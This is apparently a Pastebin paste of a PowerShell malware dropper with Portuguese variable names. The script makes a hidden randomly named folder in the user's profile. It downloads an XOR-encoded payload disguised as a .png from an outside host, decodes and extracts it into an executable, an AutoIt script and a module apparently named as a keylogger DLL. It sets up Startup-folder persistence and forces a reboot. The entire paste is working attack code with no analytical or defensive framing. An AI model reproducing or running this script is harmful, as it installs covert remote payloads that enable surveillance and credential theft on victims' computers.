Advertisement
imagemdel

poweps1.ps1

Feb 28th, 2020 (edited)
306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.20 KB | None | 0 0
  1. $strCaminhoArquivoLog = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyy2019.ini'))"
  2.  
  3. $bExisteArquivoLog = [System.IO.File]::Exists($strCaminhoArquivoLog)
  4.  
  5. function gera-strrand
  6. {
  7. -join ((65..90) + (97..122) | Get-Random -Count $args[0] | % {[char]$_})
  8. }
  9.  
  10. if (-Not $bExisteArquivoLog)
  11. {
  12. "" | Set-Content $strCaminhoArquivoLog
  13.  
  14. $NomePasta = gera-strrand 3
  15.  
  16. $Directory = "." + $NomePasta
  17.  
  18. $array = (0..6)
  19. $array[0] = [environment]::getfolderpath("MyDocuments")
  20. $array[1] = [environment]::getfolderpath("MyMusic")
  21. $array[2] = [environment]::getfolderpath("MyPictures")
  22. $array[3] = [environment]::getfolderpath("Templates")
  23. $array[4] = "$env:USERPROFILE\Microsoft\Windows"
  24. $array[6] = "$env:USERPROFILE\Microsoft"
  25.  
  26. $Num = Get-Random -Maximum 6
  27.  
  28. $strCaminhoPastaCaixa = $array[$Num] + "\" + $Directory + "\"
  29.  
  30. New-Item -ItemType directory -Path $strCaminhoPastaCaixa
  31.  
  32. $strCaminhoCaixaZipada = gera-strrand 8
  33.  
  34. $strCaminhoCaixaZipada = "$strCaminhoPastaCaixa$strCaminhoCaixaZipada.zip"
  35.  
  36. $strUrlCaixaZipada = "https://filecentrals.com/camcm/camcm.png"
  37.  
  38. (New-Object System.Net.WebClient).DownloadFile($strUrlCaixaZipada, $strCaminhoCaixaZipada)
  39.  
  40. $objBytesCaixaZipada = [System.IO.File]::ReadAllBytes($strCaminhoCaixaZipada)
  41. for($i=0; $i -lt $objBytesCaixaZipada.count; $i++)
  42. {
  43. $objBytesCaixaZipada[$i] = $objBytesCaixaZipada[$i] -bxor 0x91
  44. }
  45. [System.IO.File]::WriteAllBytes($strCaminhoCaixaZipada,$objBytesCaixaZipada)
  46.  
  47. $objArrayArqsZip = New-Object System.Collections.ArrayList
  48. $objShelApplication = New-Object -com shell.application
  49. $objArquivoZipado = $objShelApplication.NameSpace($strCaminhoCaixaZipada)
  50.  
  51. foreach($item in $objArquivoZipado.items())
  52. {
  53. $objShelApplication.Namespace($strCaminhoPastaCaixa).copyhere($item)
  54. $objArrayArqsZip.Add($item.name)
  55. }
  56.  
  57. $strNomeModuloDllKl = gera-strrand 7
  58. $strPathModuloDllKl = $strCaminhoPastaCaixa + $strNomeModuloDllKl + "."
  59.  
  60. $strNomeModuloExecutor = gera-strrand 5
  61. $strPathModuloExecutor = $strCaminhoPastaCaixa + $strNomeModuloExecutor + ".exe"
  62.  
  63. $strNomeScriptAutoIt = gera-strrand 8
  64. $strPathScriptAutoIt = $strCaminhoPastaCaixa + $strNomeScriptAutoIt
  65. foreach ($element in $objArrayArqsZip)
  66. {
  67. $intTamArquivo = (Get-Item "$strCaminhoPastaCaixa$element").Length
  68. if ($intTamArquivo -lt 2000)
  69. {
  70. Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathScriptAutoIt
  71. }
  72. elseif ($intTamArquivo -lt 1000000)
  73. {
  74. Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloExecutor
  75. }
  76. else
  77. {
  78. Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloDllKl
  79. }
  80. }
  81.  
  82. Start-Sleep -s 5
  83. Remove-Item -Path $strCaminhoCaixaZipada -Force
  84. $strNomeLNK = $env:UserName
  85. $objShell = New-Object -ComObject ("WScript.Shell")
  86. $startup = [environment]::getfolderpath("Startup")
  87. $objShortCut = $objShell.CreateShortcut($startup + "\" + $strNomeLNK + ".lnk")
  88. $objShortCut.TargetPath = $strPathModuloExecutor
  89. $objShortCut.Description = $strNomeModuloExecutor
  90. $objShortCut.Arguments = "$strNomeScriptAutoIt $strNomeModuloDllKl"
  91. $objShortCut.WorkingDirectory = $strCaminhoPastaCaixa
  92. $objShortCut.Hotkey = "CTRL+SHIFT+F"
  93. $objShortCut.IconLocation = "Shell32.dll, 29";
  94. $objShortCut.Description = gera-strrand 50
  95. $objShortCut.Save()
  96.  
  97. Restart-Computer -F
  98.  
  99. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement